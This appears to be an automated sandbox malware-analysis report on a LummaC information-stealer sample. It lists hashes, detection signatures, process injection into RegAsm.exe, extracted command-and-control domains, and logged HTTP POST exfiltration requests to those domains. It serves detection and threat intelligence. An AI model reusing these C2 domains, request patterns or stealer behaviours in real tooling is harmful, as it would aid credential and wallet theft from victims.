Windows Analysis Report
mkFOY01Gl5.exe

Overview

General Information

Sample name: mkFOY01Gl5.exe (renamed because original name is a hash value)
Original sample name: 0309dd0131150796ea99b30a62194fae.exe
Analysis ID: 1465097
MD5: 0309dd0131150796ea99b30a62194fae
SHA1: 2df6e334708eae810a74b844fd57e18e9fdc34cd
SHA256: 07c09ba5a84f619e5b83a54298ffc58d20b00f14399c7a94b7f02b70efc60f35
Tags: 32, exe, trojan

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • mkFOY01Gl5.exe (PID: 6056 cmdline: "C:\Users\user\Desktop\mkFOY01Gl5.exe" MD5: 0309DD0131150796EA99B30A62194FAE)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 6976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 1796 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyzd", "ellaboratepwsz.xyzu", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "potterryisiw.shop"], "Build id": "H8NgCl--default2806"}
Source: sslproxydump.pcap | Rule: JoeSecurity_LummaCStealer_3 | Description: Yara detected LummaC Stealer | Author: Joe Security
Source: decrypted.memstr | Rule: JoeSecurity_LummaCStealer_2 | Description: Yara detected LummaC Stealer | Author: Joe Security
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: mkFOY01Gl5.exe | Avira: detected
Source: https://potterryisiw.shop/piR | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/apiA48) | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/t | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/pi | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/api | Avira URL Cloud: Label: malware
Source: foodypannyjsud.shop | Avira URL Cloud: Label: malware
Source: pedestriankodwu.xyz | Avira URL Cloud: Label: malware
Source: contintnetksows.shop | Avira URL Cloud: Label: malware
Source: potterryisiw.shop | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/(q | Avira URL Cloud: Label: malware
Source: penetratedpoopp.xyz | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/lli | Avira URL Cloud: Label: malware
Source: swellfrrgwwos.xyz | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/ | Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/api44 | Avira URL Cloud: Label: malware
Source: 4.2.RegAsm.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyzd", "ellaboratepwsz.xyzu", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "potterryisiw.shop"], "Build id": "H8NgCl--default2806"}
Source: https://potterryisiw.shop/api | Virustotal: Detection: 13%
Source: mkFOY01Gl5.exe | ReversingLabs: Detection: 68%
Source: mkFOY01Gl5.exe | Virustotal: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: mkFOY01Gl5.exe | Joe Sandbox ML: detected
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: pedestriankodwu.xyz
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: towerxxuytwi.xyzd
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: ellaboratepwsz.xyzu
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: penetratedpoopp.xyz
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: swellfrrgwwos.xyz
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: contintnetksows.shop
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: foodypannyjsud.shop
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: potterryisiw.shop
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: potterryisiw.shop
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: H8NgCl--default2806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00417592 CryptUnprotectData
Source: mkFOY01Gl5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: mkFOY01Gl5.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_0010AA16 FindFirstFileExW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp ecx (4_2_0043B00A)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp+14h] (4_2_004180AA)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx (4_2_0041B990)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, dword ptr [esp+00000A90h] (4_2_0041FAE0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ecx], al (4_2_00428A88)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [edi+0Ch] (4_2_00402D60)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp+000000F4h] (4_2_00424F10)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [esi+eax], 0000h (4_2_00424F10)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, dword ptr [esp+18h] (4_2_0040FF30)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, eax (4_2_004241DE)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h (4_2_004241DE)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] (4_2_00439270)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] (4_2_00439270)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp+08h] (4_2_004212D0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h (4_2_004212D0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [esi+eax], 0000h (4_2_00425350)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ecx (4_2_004083F0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ecx+eax*4], bx (4_2_004083F0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax (4_2_0041343E)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push edi (4_2_00426483)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp esi (4_2_0043C4BB)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp esi (4_2_0043C5C0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp+08h] (4_2_00416637)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp ecx (4_2_0043B776)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp esi (4_2_0043C7C0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp esi (4_2_0043C8C0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [ebx], 00000000h (4_2_00413940)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, dword ptr [esp+08h] (4_2_00423976)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp ecx (4_2_00423976)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] (4_2_0040EA70)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] (4_2_00426A10)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx (4_2_00425A2A)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then inc ebx (4_2_00416AD0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 3BEBD150h (4_2_00436AD2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [esi+ebx], 0000h (4_2_0041BB40)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] (4_2_00433BF0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [00449828h] (4_2_0043AC04)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] (4_2_00438C80)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] (4_2_00413D71)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, edi (4_2_00422E75)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp edx (4_2_00421EB0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ecx], al (4_2_00428F65)

Networking

Source: Malware configuration extractor | URLs: pedestriankodwu.xyz
Source: Malware configuration extractor | URLs: towerxxuytwi.xyzd
Source: Malware configuration extractor | URLs: ellaboratepwsz.xyzu
Source: Malware configuration extractor | URLs: penetratedpoopp.xyz
Source: Malware configuration extractor | URLs: swellfrrgwwos.xyz
Source: Malware configuration extractor | URLs: contintnetksows.shop
Source: Malware configuration extractor | URLs: foodypannyjsud.shop
Source: Malware configuration extractor | URLs: potterryisiw.shop
Source: Malware configuration extractor | URLs: potterryisiw.shop
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12841 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15083 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20573 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 3806 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1299 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 546185 | Host: potterryisiw.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 88 | Host: potterryisiw.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: potterryisiw.shop
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: potterryisiw.shop
Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2574481805.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/(q
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/api
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/api44
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/apiA48)
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/lli
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/pi
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/piR
Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://potterryisiw.shop/t
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00430CF0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00430CF0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00430F10 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_00114920
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_00104869
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_0010E8C8
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_00105289
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_000FDAB4
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_00100B00
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: 0_2_000F3D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00417592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004227B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00417AC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00404E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00421F5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00402FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00409060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00436120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004241DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043E1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004211E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00439270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041E2CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004083F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043C4BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00422569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043E510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043C5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004035E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0042166A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00406770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043C8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004188EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00423976
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00403990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043CA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00426CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00401CDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00401CA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00406D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043CD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040FD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00401EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00422EE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00422F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041EF39
Source: C:\Users\user\Desktop\mkFOY01Gl5.exe | Code function: String function: 000F7EF0 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00408E40 appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004095C0 appears 196 times
